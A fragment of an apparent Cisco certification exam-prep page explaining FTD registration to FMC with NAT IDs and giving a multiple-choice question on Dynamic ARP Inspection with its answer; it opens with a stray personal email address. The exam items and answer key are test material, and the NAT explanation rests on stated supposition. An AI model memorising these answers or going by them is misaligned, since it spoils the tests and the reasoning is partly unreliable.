willsonliam55@gmail.com Skype Apple Kid

address of the FMC). You need to use the same registration key in FMC when adding this FTD as a
managed device.

Reference: https://cyruslab.net/2019/09/03/ciscocisco-firepower-lab-setup/

In fact this is an unclear question, please read the note below:

Note:

According to this Cisco reference:

– If the FMC is behind a NAT device, enter a unique NAT ID along with the registration key, and specify
DONTRESOLVE instead of the hostname, for example:

Example:
> configure manager add DONTRESOLVE regk3y78
natid90

– If the FTD is behind a NAT device, enter a unique NAT ID along with the FMC IP address or hostname,
for example:

Example:
> configure manager add 10.70.45.5 regk3y78
natid56

Now return to our question. In the exhibit we see a value of 16 in the “Unique NAT ID” and the question
stated that “FTD is not behind a NAT device” so we can only suppose FMC is behind a NAT device. So the
correct solution should be “configure manager add DONTRESOLVE <registration key> 16” but there is no
such answer. Therefore we have to suppose there are no NAT device between FMC and FTD.

Question 46

A switch with Dynamic ARP Inspection enabled has received a spoofed ARP response on a trusted
interface. How does the switch behave in this situation?

A. It forwards the packet after validation by using the MAC Binding Table.
B. It drops the packet after validation by using the IP & MAC Binding Table.
C. It forwards the packet without validation.
D. It drops the packet without validation.

Answer: C

You might also like